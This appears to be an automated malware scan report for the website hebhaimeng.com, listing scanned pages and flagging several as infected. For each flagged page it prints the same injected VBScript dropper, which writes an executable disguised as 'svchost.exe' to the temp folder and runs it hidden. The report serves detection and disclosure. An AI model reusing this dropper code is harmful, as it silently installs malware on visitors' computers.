Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hebhaimeng.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hebhaimeng.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 10:54:34 GMT Location: index.html Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://www.hebhaimeng.com/index.html | 200 OK Content-Length: 21824 Content-Type: text/html | clean |
http://www.hebhaimeng.com/img/menu.js | 200 OK Content-Length: 57272 Content-Type: application/javascript | clean |
http://www.hebhaimeng.com/img/common.js | 200 OK Content-Length: 4329 Content-Type: application/javascript | clean |
http://www.hebhaimeng.com/img/hd.js | 200 OK Content-Length: 2278 Content-Type: application/javascript | clean |
http://www.hebhaimeng.com/img/common.condenast.js | 200 OK Content-Length: 28180 Content-Type: application/javascript | clean |
http://www.hebhaimeng.com/img/jquery-1.4.1.min.js | 200 OK Content-Length: 71922 Content-Type: application/javascript | clean |
http://www.hebhaimeng.com/img/jquery.Loading.img.js | 200 OK Content-Length: 1888 Content-Type: application/javascript | clean |
http://www.hebhaimeng.com/zuixindongtai/ | 200 OK Content-Length: 125582 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.hebhaimeng.com/wangzhanfuwu/2012/0329/12.html | 200 OK Content-Length: 121314 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.hebhaimeng.com/yanchuqingdian/ | 200 OK Content-Length: 125502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.hebhaimeng.com/nianhuihuiyi/ | 200 OK Content-Length: 11364 Content-Type: text/html | clean |
http://www.hebhaimeng.com/zhanlanzhanshi/ | 200 OK Content-Length: 124882 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.hebhaimeng.com/xingxiangsheji/ | 200 OK Content-Length: 124721 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.hebhaimeng.com/moteliyi/ | 200 OK Content-Length: 14283 Content-Type: text/html | clean |
http://www.hebhaimeng.com/guanggaodaili/ | 200 OK Content-Length: 10119 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hebhaimeng.com
Result:
GET / HTTP/1.1
Host: hebhaimeng.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hebhaimeng.com
Referer: http://www.google.com/search?q=hebhaimeng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hebhaimeng.com
Referer: http://www.google.com/search?q=hebhaimeng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.